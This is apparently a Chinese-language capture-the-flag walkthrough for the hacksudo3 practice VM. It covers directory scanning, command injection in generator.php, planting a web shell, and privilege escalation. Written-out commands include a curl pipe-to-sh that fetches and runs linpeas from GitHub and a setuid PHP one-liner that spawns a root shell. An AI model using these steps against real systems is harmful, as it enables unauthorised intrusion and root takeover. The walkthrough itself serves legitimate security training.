hacksudo3 通关详解

环境配置

一开始桥接错网卡了 搞了半天 改回来就行了

信息收集

hacksudo3 通关详解_第1张图片

漏洞发现

扫个目录
hacksudo3 通关详解_第2张图片
大概看了一眼没什么有用的信息 然后对着login.php跑了一下弱口令 sqlmap
都没跑出来 那么利用点应该不在这 考虑到之前有过dirsearch字典太小扫不到东西的经历
换个gobuster扫一下
hacksudo3 通关详解_第3张图片
先看看generator.php
hacksudo3 通关详解_第4张图片随便填点东西执行一下 感觉像命令注入
hacksudo3 通关详解_第5张图片
hacksudo3 通关详解_第6张图片
尝试弹个shell
没成功
那就写了个一句话 然后用蚁剑传shell
hacksudo3 通关详解_第7张图片
hacksudo3 通关详解_第8张图片
hacksudo3 通关详解_第9张图片

提权

优化shell
在这里插入图片描述

看看还有没有用户,有可能待会会切过去
在这里插入图片描述
用linpeas枚举脆弱性
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
hacksudo3 通关详解_第10张图片

没看见特别显眼的
hacksudo3 通关详解_第11张图片
版本过高
考虑到有个hacksudo的用户
再收集一波信息看看能不能切过去
发现有个hacksudo的文件 hacksudo3 通关详解_第12张图片
在这里插入图片描述
有加密 一眼凯撒
试试
hacksudo3 通关详解_第13张图片
在这里插入图片描述

没有sudo权限
hacksudo3 通关详解_第14张图片
在work路径下发现sh文件
没执行权限
也没看见相关的计划任务
再传个linpeas枚举
在这里插入图片描述
可以lxd提权
在这里插入图片描述
也可以view 或 php提权
这里用php提权

CMD="/bin/sh"
./home/hacksudo/locker/php -r "posix_setuid(0); system('$CMD');"

hacksudo3 通关详解_第15张图片

你可能感兴趣的:(内网打靶,网络安全,安全)